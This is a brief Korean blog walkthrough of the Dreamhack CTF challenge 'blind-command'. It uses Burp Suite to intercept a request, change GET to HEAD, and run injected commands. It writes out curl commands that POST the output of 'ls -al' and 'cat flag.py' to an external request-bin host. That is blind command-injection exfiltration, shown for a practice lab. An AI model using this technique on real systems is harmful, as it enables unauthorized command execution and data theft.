(드림핵) blind-command

드림핵 게임 서버 (첫 번째 서버):
- GET 요청만 허용하고, POST 요청은 막혀있음
- 이 서버에서 cmd 파라미터를 GET 요청으로 받을 수 있지만, POST 요청은 처리하지 않습니다.
중간 서버:
- 이 중간 서버는 GET 요청을 POST 요청으로 변환하여, 드림핵 툴 서버로 전달합니다.
- 이때 중간 서버에서 요청을 변환하는 데 Burp Suite를 사용한다.
드림핵 툴 서버 (두 번째 서버):
- 이 서버에서는 POST 요청을 받으며, 플래그를 획득할 수 있습니다.
- 예를 들어, POST 요청을 통해 플래그를 전달하는 방식입니다.

이렇게 진행되어야 풀리는 문제이므로 시나리오를 작성했습니다.

이것을 풀기위해서는 Burp Suite을 들어가서 open browser을 엽니다.

드림핵 게임의 주소를 복사하여 여기다가 붙여넣습니다. 그러면 밑의 크롬이 파란색처럼 새로열린것을 확인할수있습니다.

위의 사진처럼 해놓고 Intercept on을 해줍니다. 이것을 하는 이유는 요청을 하나씩 확인하기 위해서입니다.

?cmd=ls를 입력하면 저렇게 보이는것을 확인할 수있습니다.

드림핵 툴을 이용해서 링크를 생성한다음 이곳으로 요청을 하면 값을 확인 할 수있습니다.

curl -X POST https://eyetfee.request.dreamhack.games -d "$(ls -al)" 을 입력해준다. 그리고 이 GET을 HEAD로 변경해주고 Forward를 클릭해주면 드림핵 툴 Body에 값이 전달 되는 것을 확인 할 수있다.

그러면 이제 curl -X POST https://eyetfee.request.dreamhack.games -d "$(cat flag.py)"를 입력하면 플래그를 획득할 수있다.

jdh07310 님의 블로그